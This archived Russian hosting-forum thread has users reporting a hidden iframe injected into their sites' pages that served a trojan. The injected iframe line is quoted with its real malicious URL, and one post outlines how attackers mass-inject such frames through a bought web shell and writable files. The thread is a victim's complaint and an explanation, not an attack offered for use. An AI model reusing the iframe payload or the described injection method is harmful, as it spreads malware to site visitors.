Олег Андреевич Авдеев.
03.12.2006 в 11:23 я обнаружил в каждом файле *.html *.php своего аккаунта в hostseller.ru следующий скрипт (вместо угловых скобок я поставил фигурные) :
{iframe width="1" height="1" src="http://traff.step57.info/me02" style="border: 0;"}{/iframe}
Я немедленно запросил хостера - кто вставил эту строку (как выяснилось, эта строка обнаружилась и в других моих сайтах у этого хостера).
Но с тех пор ни ответа ни привета от него. Хостинг кончается в апреле, на мои письма hostseller.ru не отвечает. Деньги пропали.
Полная версия: hostseller.ru
Онлайн-форум hostobzor.ru > Архив (темы до 1.06.2015). Только для чтения. > Пресс-центр Хостинг-Провайдеров > Претензии и жалобы клиентов
Почти такая же строка (основной домен тот же) обнаружилась и на моем сайте, который размещается на Ht-Systems.ru. При заходе на страницу автоматически пытался скачиваться троян. Каким образом взломали сайт мы так точно и не поняли 
Оффтоп
Может я не прав, но зачем было вылаживать линк? Я уже клацнуть захотел
Может я не прав, но зачем было вылаживать линк? Я уже клацнуть захотел
Я не думаю, что хостер вам сможет помочь в данном случае.
Я могу описать примерный механизм того, как вставляется ифрейм (некоторые хакеры используют такой метод для заработка - за каждую загрузку вируса/трояна по ссылке им капают деньги):
находится 1 уязвимый сайт на хосте или покупается в соответствующем месте (forum.web-hack.ru подойдет) веб-шелл или фтп доступ к одному аккаунту. После этого производится поиск всех файлов, доступных на запись (сначала надо получить список виртуальных хостов или домашних папок юзеров, затем можно использовать открытую статистику (если хостер держит вебализер или подобное) и т.д. итог - создание для себя достаточного дерева хтмл файлов и скриптов, куда, если апач запускается без суекзека (т.е. не под юзером проще говоря), мы можем вставить фреймы) и затем туда записываются фреймы - как и чем угодно - я не думаю, что у хостера в логах хранятся например все вызовы cp/cat/mv за последнюю неделю... - так что спрашивать хостера тут не очень эффективно. Да - и кроме того - уже давно существуют скрипты для автоматизации описанного выше процесса (стоят недорого, а кое-какие и бесплатно) - так что даже если будет определен вдруг ip злоумышленника, то это может оказаться адресом хоста, с которого он инициировал выполнение скрипта (wget ом например)
Вот проследить, чтобы ваш сайт не был виден злоумышленнику или о его внутренней струкруте было минимум информации - это уже дело владельца сайта...
что-то я ушел в оффтоп и даже вроде защищаю хостеров... но поверьте - по собственному опыту говорю - хостеру поймать злоумышленника в данном случае сложно
Я могу описать примерный механизм того, как вставляется ифрейм (некоторые хакеры используют такой метод для заработка - за каждую загрузку вируса/трояна по ссылке им капают деньги):
находится 1 уязвимый сайт на хосте или покупается в соответствующем месте (forum.web-hack.ru подойдет) веб-шелл или фтп доступ к одному аккаунту. После этого производится поиск всех файлов, доступных на запись (сначала надо получить список виртуальных хостов или домашних папок юзеров, затем можно использовать открытую статистику (если хостер держит вебализер или подобное) и т.д. итог - создание для себя достаточного дерева хтмл файлов и скриптов, куда, если апач запускается без суекзека (т.е. не под юзером проще говоря), мы можем вставить фреймы) и затем туда записываются фреймы - как и чем угодно - я не думаю, что у хостера в логах хранятся например все вызовы cp/cat/mv за последнюю неделю... - так что спрашивать хостера тут не очень эффективно. Да - и кроме того - уже давно существуют скрипты для автоматизации описанного выше процесса (стоят недорого, а кое-какие и бесплатно) - так что даже если будет определен вдруг ip злоумышленника, то это может оказаться адресом хоста, с которого он инициировал выполнение скрипта (wget ом например)
Вот проследить, чтобы ваш сайт не был виден злоумышленнику или о его внутренней струкруте было минимум информации - это уже дело владельца сайта...
что-то я ушел в оффтоп и даже вроде защищаю хостеров... но поверьте - по собственному опыту говорю - хостеру поймать злоумышленника в данном случае сложно
[quote name='Oleg A' date='25.02.2007, 16:36' post='71850'остинг кончается в апреле, на мои письма hostseller.ru не отвечает. Деньги пропали. [/quote]
Тут может быть как минимум 2 варианта:
Тут может быть как минимум 2 варианта:
- Утащили пароли клиентов через трояны
- Взломали сервер и получили все пароли, например из базы биллинга, если они хранились в открытом виде.
Могли и стереть базу биллинга при этом кстати - так что хостер остался без связи со своими клиентами... (я думаю перед этим уже сделали дамп и продают где-нибудь на вебхаке, как это было с lx-host.net)...
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.